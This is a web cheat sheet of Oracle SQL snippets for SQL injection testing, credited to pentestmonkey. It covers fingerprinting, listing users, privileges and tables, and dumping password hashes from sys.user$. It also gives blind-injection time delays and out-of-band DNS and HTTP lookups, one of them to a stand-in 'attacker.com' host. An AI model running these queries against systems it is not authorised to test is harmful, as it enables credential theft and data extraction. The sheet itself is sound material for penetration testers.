Cheatography
https://cheatography.com
Source: pentestmonkey.net
VersionSELECT banner FROM v$version WHERE banner LIKE ‘Oracle%’; | SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’; | SELECT version FROM v$instance; |
CommentsSELECT 1 FROM dual — comment | – NB: SELECT statements must have a FROM clause in Oracle so we have to use the dummy table name ‘dual’ when we’re not actually selecting from a table. |
List UsersSELECT username FROM all_users ORDER BY username; | SELECT name FROM sys.user$; — priv |
List Password HashesSELECT name, password, astatus FROM sys.user$ — priv, <= 10g | SELECT name,spare4 FROM sys.user$ — priv, 11g |
List PrivilegesSELECT * FROM session_privs; — current privs | SELECT * FROM dba_sys_privs WHERE grantee = ‘DBSNMP’; — priv, list a user’s privs | SELECT grantee FROM dba_sys_privs WHERE privilege = ‘SELECT ANY DICTIONARY’; — priv, find users with a particular priv | SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS; |
Location of DB filesSELECT name FROM V$DATAFILE; |
Avoiding QuotesSELECT chr(65) || chr(66) FROM dual; — returns AB |
Hostname, IP AddressSELECT UTL_INADDR.get_host_name FROM dual; | SELECT host_name FROM v$instance; | SELECT UTL_INADDR.get_host_address FROM dual; — gets IP address | SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROM dual; — gets hostnames |
Time DelayBEGIN DBMS_LOCK.SLEEP(5); END; — priv, can’t seem to embed this in a SELECT | SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROM dual; — if reverse looks are slow | SELECT UTL_INADDR.get_host_address(‘blah.attacker.com’) FROM dual; — if forward lookups are slow | SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual; — if outbound TCP is filtered / slow |
Case StatementSELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; — returns 1 | SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; — returns 2 |
Make DNS RequestsSELECT UTL_INADDR.get_host_address(‘google.com’) FROM dual; | SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual; |
String ConcatenationSELECT ‘A’ || ‘B’ FROM dual; — returns AB |
| | Current DatabaseSELECT global_name FROM global_name; | SELECT name FROM v$database; | SELECT instance_name FROM v$instance; | SELECT SYS.DATABASE_NAME FROM DUAL; |
List DatabasesSELECT DISTINCT owner FROM all_tables; — list schemas (one per user) – Also query TNS listener for other databases. See tnscmd (services | status). |
List ColumnsSELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’; | SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’ and owner = ‘foo’; |
Bitwise ANDSELECT bitand(6,2) FROM dual; — returns 2 | SELECT bitand(6,1) FROM dual; — returns0 |
If StatementBEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; — doesn’t play well with SELECT statements |
List DBA AccountsSELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = ‘YES’; — priv, list DBAs, DBA roles |
Select Nth RowSELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; — gets 9th row (rows numbered from 1) |
List TablesSELECT table_name FROM all_tables; | SELECT owner, table_name FROM all_tables; |
Find Tables From Column NameSELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE ‘%PASS%’; — NB: table names are upper case |
Select Nth CharSELECT substr(‘abcd’, 3, 1) FROM dual; — gets 3rd character, ‘c’ |
ASCII Value -> CharSELECT chr(65) FROM dual; — returns A |
CastingSELECT CAST(1 AS char) FROM dual; | SELECT CAST(’1′ AS int) FROM dual; |
Char -> ASCII ValueSELECT ascii(‘A’) FROM dual; — returns 65 |
|
Created By
Metadata
Favourited By
Comments
No comments yet. Add yours below!
Add a Comment
Related Cheat Sheets
More Cheat Sheets by Dormidera